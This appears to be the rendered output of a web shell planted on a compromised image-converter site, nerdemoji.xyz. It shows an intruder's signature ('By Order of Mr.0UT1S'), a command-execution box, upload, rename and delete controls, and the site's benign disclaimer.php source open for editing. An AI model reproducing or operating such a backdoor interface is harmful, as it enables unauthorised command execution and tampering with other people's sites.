home
/
aioutajg
/
nerdemoji.xyz
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] assets
N/A
[DIR] includes
N/A
[DIR] uploads
N/A
.htaccess
350 bytes
Rename
Delete
Backup.zip
27.32 MB
Rename
Delete
Image converter, resizer and compressor tool script.zip
137.55 KB
Rename
Delete
about-us.php
1.81 KB
Rename
Delete
ads.txt
58 bytes
Rename
Delete
contact-us.php
1.07 KB
Rename
Delete
cookies.php
2.99 KB
Rename
Delete
disclaimer.php
2.13 KB
Rename
Delete
index.php
3.30 KB
Rename
Delete
privacy.php
3.51 KB
Rename
Delete
process.php
9.28 KB
Rename
Delete
sitemap.xml
1.31 KB
Rename
Delete
terms.php
2.73 KB
Rename
Delete
<?php // disclaimer.php $pageTitle = "Disclaimer - Nerd Emoji Image Converter"; $metaDescription = "Read the disclaimer for Nerd Emoji Image Converter regarding the use of our services and the information provided."; include 'includes/head.php'; // Include head section include 'includes/header.php'; // Include header ?> <div class="disclaimer-container"> <h1>Disclaimer</h1> <p>The information provided by Nerd Emoji is for general informational purposes only. While we strive to ensure that the information is accurate and up-to-date, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability, or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose.</p> <h2 style="text-align: left;">1. Use at Your Own Risk</h2> <p>Any reliance you place on such information is strictly at your own risk. In no event will we be liable for any loss or damage, including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the use of this website.</p> <h2 style="text-align: left;">2. External Links</h2> <p>Through this website, you are able to link to other websites that are not under the control of Nerd Emoji. We have no control over the nature, content, and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.</p> <h2 style="text-align: left;">3. Changes to the Disclaimer</h2> <p>We may update this disclaimer from time to time. We will notify you of any changes by posting the new disclaimer on this page. Please review this disclaimer periodically for any updates.</p> <h2 style="text-align: left;">4. Contact Us</h2> <p>If you have any questions about this disclaimer, please contact us at <a href="mailto:info@nerdemoji.xyz">info@nerdemoji.xyz</a>.</p> </div> <?php include 'includes/footer.php'; // Include footer ?>
Save